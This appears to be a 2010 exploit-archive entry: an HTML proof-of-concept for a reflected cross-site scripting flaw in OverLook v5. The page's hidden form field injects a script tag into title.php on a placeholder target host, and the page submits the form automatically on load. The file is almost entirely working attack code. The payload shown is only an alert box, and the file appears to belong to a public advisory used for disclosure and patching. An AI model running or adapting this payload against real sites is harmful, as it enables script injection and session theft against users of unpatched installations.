Overlook 5 suffers from a cross site scripting vulnerability.
c5cd17c2366ef3ff6d1ddd1f05324730b983fb520508b799326ac8e67993fe62
<!--
-*-*- ANATOLIA SECURITY (c) 2010 -*-*-
$ Title: Proof of Concept Code for OverLook v5 Cross-site Scripting Vuln.
$ ADV-ID: 2010-002
$ ADV-URL: http://www.anatoliasecurity.com/adv/as-adv-2010-002.txt
$ Technical Details: http://www.anatoliasecurity.com/advisories/overlook-xss
* PoC created by Eliteman
~ mail: eliteman [~AT~] anatoliasecurity [~DOT~] com
~ web: elite.anatoliasecurity.com
-->
<html>
<head>
<title> OverLook v5.0 Cross-site Scripting </title>
</head>
<body>
<form action="http://target/overlook/title.php" method="get">
<input type="hidden" name="frame" value=""><script>alert(/1337/)</script><--">
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>
</body>
</html>